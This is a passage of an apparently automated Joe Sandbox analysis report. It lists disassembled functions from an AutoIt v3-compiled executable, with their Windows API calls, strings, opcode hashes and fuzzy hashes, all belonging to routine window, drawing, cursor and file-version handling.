                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 2326795674-4108050209
                                                                                                                                                  • Opcode ID: 842804b4919ea02e0faca09e9e603944b0a11db276c2c661fab52358618a608e
                                                                                                                                                  • Instruction ID: 228c9cc2149da6cd8a2cd42fc76e95c180f80090fbcf299cc19bb1b204e8dcf8
                                                                                                                                                  • Opcode Fuzzy Hash: 842804b4919ea02e0faca09e9e603944b0a11db276c2c661fab52358618a608e
                                                                                                                                                  • Instruction Fuzzy Hash: F602FF70148701AFEB25CF14C848BAABBE4FF89314F14861DF9AAD62A1D774DA40DF52
                                                                                                                                                  Function 00C4AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?), ref: 00C4AF51
                                                                                                                                                  • SetTextColor.GDI32(?,?,00000000,?,?,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000), ref: 00C4AF55
                                                                                                                                                  • GetSysColorBrush.USER32(0000000F,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4AF6B
                                                                                                                                                  • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4AF76
                                                                                                                                                  • CreateSolidBrush.GDI32(?,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4AF7B
                                                                                                                                                  • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4AF93
                                                                                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4AFA1
                                                                                                                                                  • SelectObject.GDI32(?,00000000,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4AFB2
                                                                                                                                                  • SetBkColor.GDI32(?,00000000,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4AFBB
                                                                                                                                                  • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4AFC8
                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4AFE7
                                                                                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005,?,?,?,?,?,?,?,00C4AC1F,?), ref: 00C4AFFE
                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4B013
                                                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?), ref: 00C4B05F
                                                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,00C4AC1F,?,?,00000000,?,?), ref: 00C4B086
                                                                                                                                                  • InflateRect.USER32(?,000000FD,000000FD,?,?,?,?,?,?,?,00C4AC1F,?), ref: 00C4B0A4
                                                                                                                                                  • DrawFocusRect.USER32(?,?,?,?,?,?,?,?,?,00C4AC1F,?), ref: 00C4B0AF
                                                                                                                                                  • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,00C4AC1F), ref: 00C4B0BD
                                                                                                                                                  • SetTextColor.GDI32(?,00000000,?,?,?,?,?,?,?,00C4AC1F), ref: 00C4B0C5
                                                                                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?,?,?,?,?,?,?,?,00C4AC1F), ref: 00C4B0D9
                                                                                                                                                  • SelectObject.GDI32(?,00C4AC1F,?,?,?,?,?,?,?,00C4AC1F), ref: 00C4B0F0
                                                                                                                                                  • DeleteObject.GDI32(?,?,?,?,?,?,?,?,00C4AC1F), ref: 00C4B0FB
                                                                                                                                                  • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,00C4AC1F), ref: 00C4B101
                                                                                                                                                  • DeleteObject.GDI32(?,?,?,?,?,?,?,?,00C4AC1F), ref: 00C4B106
                                                                                                                                                  • SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,00C4AC1F), ref: 00C4B10C
                                                                                                                                                  • SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,00C4AC1F), ref: 00C4B116
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1996641542-0
                                                                                                                                                  • Opcode ID: e34657d029d114df7d4b54c3df288abe2d2b8d8abe144474c0e77e56106d0e59
                                                                                                                                                  • Instruction ID: 24fa8126fc6ab29caf06fa2250d716ed705a095c9461b7e16530c8bfd5a120d0
                                                                                                                                                  • Opcode Fuzzy Hash: e34657d029d114df7d4b54c3df288abe2d2b8d8abe144474c0e77e56106d0e59
                                                                                                                                                  • Instruction Fuzzy Hash: E1613BB5900219AFDB119FA4DC48BAEBB79FF08321F204115F925BB2A1D7759E80DF90
                                                                                                                                                  Function 00C48FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E,?,?,?,?,?), ref: 00C490EA
                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C490FB
                                                                                                                                                  • CharNextW.USER32(0000014E), ref: 00C4912A
                                                                                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C4916B
                                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158,?,0000014E,00C877C4), ref: 00C49181
                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C49192
                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E,?,?,?,?,?), ref: 00C491AF
                                                                                                                                                  • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 00C491FB
                                                                                                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00C49211
                                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C49242
                                                                                                                                                  • _memset.LIBCMT ref: 00C49267
                                                                                                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004,00000000,0000014E,00C877C4), ref: 00C492B0
                                                                                                                                                  • _memset.LIBCMT ref: 00C4930F
                                                                                                                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C49339
                                                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000001,00000000,0000014E,00C877C4), ref: 00C49391
                                                                                                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00C4943E
                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00C49460
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C494AA
                                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C494D7
                                                                                                                                                  • DrawMenuBar.USER32(?), ref: 00C494E6
                                                                                                                                                  • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 00C4950E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 1073566785-4108050209
                                                                                                                                                  • Opcode ID: ae5671c8154ff445e77d018dcf00dcf71ba6cb619b408edd02cef420ca398f3e
                                                                                                                                                  • Instruction ID: d2cd27c86cdf876138b4c1e9cc90243f92f8caeffec08f5ab6ad940c084b6547
                                                                                                                                                  • Opcode Fuzzy Hash: ae5671c8154ff445e77d018dcf00dcf71ba6cb619b408edd02cef420ca398f3e
                                                                                                                                                  • Instruction Fuzzy Hash: D1E14C75900229ABDB219F55CC88FEF7BB8FF09710F108196F925AA191DB708A81DF61
                                                                                                                                                  Function 00C44ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00C45007
                                                                                                                                                  • GetDesktopWindow.USER32(?), ref: 00C4501C
                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00C45023
                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C45085
                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00C450B1
                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C450DA
                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C450F8
                                                                                                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00C4511E
                                                                                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00C45133
                                                                                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00C45146
                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00C45166
                                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00C45181
                                                                                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00C45195
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00C451AD
                                                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00C451D3
                                                                                                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00C451ED
                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00C45204
                                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00C4526F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                  • String ID: ($0$tooltips_class32
                                                                                                                                                  • API String ID: 698492251-4156429822
                                                                                                                                                  • Opcode ID: 16b8eefae959a79e31aadf217e3547cf3afb045dd462decb091cc41ddc29f69a
                                                                                                                                                  • Instruction ID: 09734c4db97895dc60e7e01b1eee206298a5a8b954647f0c16d556e57a66fa03
                                                                                                                                                  • Opcode Fuzzy Hash: 16b8eefae959a79e31aadf217e3547cf3afb045dd462decb091cc41ddc29f69a
                                                                                                                                                  • Instruction Fuzzy Hash: 51B17C71604741AFD714DF64C884B6EBBE4BF88310F00891DF999AB292DB71ED45CB91
                                                                                                                                                  Function 00C2498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C2499C
                                                                                                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C249C2
                                                                                                                                                  • _wcscpy.LIBCMT ref: 00C249F0
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C249FB
                                                                                                                                                  • _wcscat.LIBCMT ref: 00C24A11
                                                                                                                                                  • _wcsstr.LIBCMT ref: 00C24A1C
                                                                                                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C24A38
                                                                                                                                                  • _wcscat.LIBCMT ref: 00C24A81
                                                                                                                                                  • _wcscat.LIBCMT ref: 00C24A88
                                                                                                                                                  • _wcsncpy.LIBCMT ref: 00C24AB3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                  • API String ID: 699586101-1459072770
                                                                                                                                                  • Opcode ID: c5552888f4489ad97ba565f51f66a9d720816dabbbc1a5e87fc5dfa835038986
                                                                                                                                                  • Instruction ID: bd20f1b2391cb49a4e732ae85183305b44ab4b254ea8c07a0adbdddcf77bee17
                                                                                                                                                  • Opcode Fuzzy Hash: c5552888f4489ad97ba565f51f66a9d720816dabbbc1a5e87fc5dfa835038986
                                                                                                                                                  • Instruction Fuzzy Hash: B1412176600254BBEB14BB369C47EBF77ECEF45721F1000A9F904A6193EB30EA4196A5
                                                                                                                                                  Function 00BC2BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BC2C8C
                                                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00BC2C94
                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BC2CBF
                                                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00BC2CC7
                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00BC2CEC
                                                                                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BC2D09
                                                                                                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BC2D19
                                                                                                                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BC2D4C
                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BC2D60
                                                                                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00BC2D7E
                                                                                                                                                  • GetStockObject.GDI32(00000011,00000000), ref: 00BC2D9A
                                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BC2DA5
                                                                                                                                                    • Part of subcall function 00BC2714: GetCursorPos.USER32(?,?,00C877B0,?,00C877B0,00C877B0,?,00C4C5FF,00000000,00000001,?,?,?,00BFBD40,?,?), ref: 00BC2727
                                                                                                                                                    • Part of subcall function 00BC2714: ScreenToClient.USER32(00C877B0,?,?,00C4C5FF,00000000,00000001,?,?,?,00BFBD40,?,?,?,?,?,00000001), ref: 00BC2744
                                                                                                                                                    • Part of subcall function 00BC2714: GetAsyncKeyState.USER32(00000001,?,00C4C5FF,00000000,00000001,?,?,?,00BFBD40,?,?,?,?,?,00000001,?), ref: 00BC2769
                                                                                                                                                    • Part of subcall function 00BC2714: GetAsyncKeyState.USER32(00000002,?,00C4C5FF,00000000,00000001,?,?,?,00BFBD40,?,?,?,?,?,00000001,?), ref: 00BC2777
                                                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,00BC13C7,00000000,000000FF), ref: 00BC2DCC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                  • String ID: AutoIt v3 GUI
                                                                                                                                                  • API String ID: 1458621304-248962490
                                                                                                                                                  • Opcode ID: 176d23ea619d9aa27d0ba46b91e64fa80086228758d70b2a64dcb7b3ff7014c7
                                                                                                                                                  • Instruction ID: 06586d726e82c01091bdcdc2b60c1776374bab8df06366429094a3685fa156c2
                                                                                                                                                  • Opcode Fuzzy Hash: 176d23ea619d9aa27d0ba46b91e64fa80086228758d70b2a64dcb7b3ff7014c7
                                                                                                                                                  • Instruction Fuzzy Hash: 3CB15C7560020A9FDB14DFA8CD99FAE7BE4FB48311F204269FA15E7290DB70E850CB54
                                                                                                                                                  Function 00BE0429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD1821: _memmove.LIBCMT ref: 00BD185B
                                                                                                                                                  • GetForegroundWindow.USER32(00C50980,?,?,?,?,?), ref: 00BE04E3
                                                                                                                                                  • IsWindow.USER32(?,?,?,?,00C50980,?,?,00000000,00C50980), ref: 00C166BB
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Foreground_memmove
                                                                                                                                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                  • API String ID: 3828923867-1919597938
                                                                                                                                                  • Opcode ID: 6ade78715178699f6c2f407d241f6994daacce329c141941fbf51ab04d775c7f
                                                                                                                                                  • Instruction ID: 7d931f90780ceb28660d0b396179b823440efcb3bfd24ff7c8a58c06064208cf
                                                                                                                                                  • Opcode Fuzzy Hash: 6ade78715178699f6c2f407d241f6994daacce329c141941fbf51ab04d775c7f
                                                                                                                                                  • Instruction Fuzzy Hash: 73D1B570104242EFCB04EF25C8819DAFBF5BF56344F104A69F8A6572A1DB30EAD9DB91
                                                                                                                                                  Function 00C4441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00C444AC
                                                                                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000,00C50980), ref: 00C4456C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                  • API String ID: 3974292440-719923060
                                                                                                                                                  • Opcode ID: 0ff0f737eaa8852f7fab2b045788046aa0a83187390d38dfca82808d3027fe43
                                                                                                                                                  • Instruction ID: 1f18148bb8b0ece74011554a863e562182e3887a02c5e4ef6b046d8e10813b64
                                                                                                                                                  • Opcode Fuzzy Hash: 0ff0f737eaa8852f7fab2b045788046aa0a83187390d38dfca82808d3027fe43
                                                                                                                                                  • Instruction Fuzzy Hash: 7DA15C702142419BCB18EF24C851B6AB7E5FF85314F2089ACF8A69B392DB30ED46DB51
                                                                                                                                                  Function 00C356C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00C356E1
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00C356EC
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00C356F7
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00C35702
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00C3570D
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00C35718
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00C35723
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00C3572E
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00C35739
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00C35744
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00C3574F
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00C3575A
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00C35765
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00C35770
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00C3577B
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00C35786
                                                                                                                                                  • GetCursorInfo.USER32(?), ref: 00C35796
                                                                                                                                                  • GetLastError.KERNEL32(00000001,00000000), ref: 00C357C1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3215588206-0
                                                                                                                                                  • Opcode ID: 7a3e9a1df04b70e8be123a106f49d5b664466f5aae59684b868f5e551f27a4e6
                                                                                                                                                  • Instruction ID: 125a15b6eda122db905662cab4abbb17409fb257e26d1e5914252046b65c1347
                                                                                                                                                  • Opcode Fuzzy Hash: 7a3e9a1df04b70e8be123a106f49d5b664466f5aae59684b868f5e551f27a4e6
                                                                                                                                                  • Instruction Fuzzy Hash: 01415370E44319AADB109FBA8C49D6EFFF8EF51B50F10452FE519E7290DAB8A500CE51
                                                                                                                                                  Function 00C1B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00C1B17B
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C1B21C
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C1B22F
                                                                                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?,00000202,?), ref: 00C1B284
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C1B2C0
                                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00C1B2F7
                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00C1B349
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00C1B37F
                                                                                                                                                  • GetParent.USER32(?,?), ref: 00C1B39D
                                                                                                                                                  • ScreenToClient.USER32(00000000), ref: 00C1B3A4
